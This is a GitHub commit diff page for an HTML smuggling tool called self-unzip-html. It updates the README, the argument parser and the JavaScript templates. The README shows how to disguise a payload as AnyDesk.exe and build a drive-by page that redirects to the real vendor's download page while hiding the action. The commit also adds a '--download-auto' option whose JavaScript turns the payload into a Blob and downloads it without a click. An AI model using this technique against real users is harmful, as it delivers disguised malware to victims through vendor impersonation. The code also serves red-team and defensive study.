You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
Repository navigation
Commit f730545
Browse filesBrowse the repository at this point in the historyBrowse files
Just search for a "thank you for downloading" page that does not start a download. There are many of them for software like Skype, AnyDesk, etc. Then rename your payload file to something an visitor of the download page would expect and create the HTML smuggling page:
108
+
Just search for a "thank you for downloading" page that does not start a download. There are many of them for software like Skype, AnyDesk, etc. Then rename your payload file to something a visitor of the download page would expect and create the HTML smuggling page:
109
109
```bash
110
110
self-unzip-html html -i AnyDesk.exe -o anydesk-download.html --driveby-redirect https://anydesk.com/en/downloads/guide/thank-you --obscure-action
111
111
```
@@ -193,6 +193,7 @@ The rest of the project is under the MIT license, so you can do whatever as long
193
193
194
194
### Head
195
195
196
+
- Renamed `--download` to `--download-link` and added `--download-auto` which automatically starts the download
196
197
- Added `--copy-text` and `--copy-base64` options for smuggling files when downloads are not possible (for example in remote browsing setups)
197
198
- Added `serve` subcommand that serves the current directory and allows downloading files directly or via HTML smuggling. Each file in a directory listing has an entry like `.DS_Store (HTML, SVG)`.
198
199
- Refactoring of the python code to make it usable as a library
@@ -203,7 +204,7 @@ The rest of the project is under the MIT license, so you can do whatever as long
203
204
- Added `--cache-password` option
204
205
- Added option to supply decryption password via `localStorage`: `localStorage.setItem("self_unzip_pw", "YOUR_PASSWORD_HERE")`
205
206
- Added `--encoding hex` option
206
-
- Added `--svg` option and ported the `--download` option to work in SVGs
payload_option_mutex.add_argument("--download", nargs="?", metavar="FILE_NAME", const="", help="show a download link to download the payload as a file. If you specify an argument that is used as the name of the file to download")
payload_option_mutex.add_argument("--download-link", nargs="?", metavar="FILE_NAME", const=NO_ARG, help="show a download link to download the payload as a file. If you specify an argument that is used as the name of the file to download")
16
+
17
+
payload_option_mutex.add_argument("--download-auto", nargs="?", metavar="FILE_NAME", const=NO_ARG, help="show a download link to download the payload as a file. If you specify an argument that is used as the name of the file to download")
14
18
payload_option_mutex.add_argument("--eval", action="store_true", help="pass the payload to eval() to run it as JavaScript code")
Copy file name to clipboardExpand all lines: python/self_unzip_html/static_js.py
+3-1Lines changed: 3 additions & 1 deletion
Original file line number
Diff line number
Diff line change
@@ -26,7 +26,9 @@
26
26
27
27
JS_COPY_TEXT="""setTimeout(()=>{let d=document.open(); let t=new TextDecoder().decode(og_data); d.write('<h2>Copy file as text</h2><button>copy</button>'); let b=d.querySelector("button"); b.onclick=()=>{navigator.clipboard.writeText(t).then(()=>{b.textContent="copied";setTimeout(()=>b.textContent="copy",2000);}).catch(e=>{console.error(e);b.textContent="copy failed";setTimeout(()=>b.textContent="copy",2000);})}}, 50);"""
28
28
29
-
JS_DOWNLOAD='let b=new Blob([og_data],{type:"application/octet-stream"});let u=URL.createObjectURL(b);document.body.innerHTML=`<h1>Unpacked {{NAME}}</h1><a href="${u}" download="{{NAME}}">Click here to download</a>`'
29
+
JS_DOWNLOAD_LINK='let b=new Blob([og_data],{type:"application/octet-stream"});let u=URL.createObjectURL(b);document.body.innerHTML=`<h1>Unpacked {{NAME}}</h1><a href="${u}" download="{{NAME}}">Click here to download</a>`'
30
+
31
+
JS_DOWNLOAD_AUTO='let b=new Blob([og_data],{type:"application/octet-stream"});let u=URL.createObjectURL(b);document.body.innerHTML=`<a href="${u}" download="{{NAME}}" id="auto-click">Click here if the download does not start automatically</a>`;setTimeout(()=>document.getElementById("auto-click").click(),50)'
0 commit comments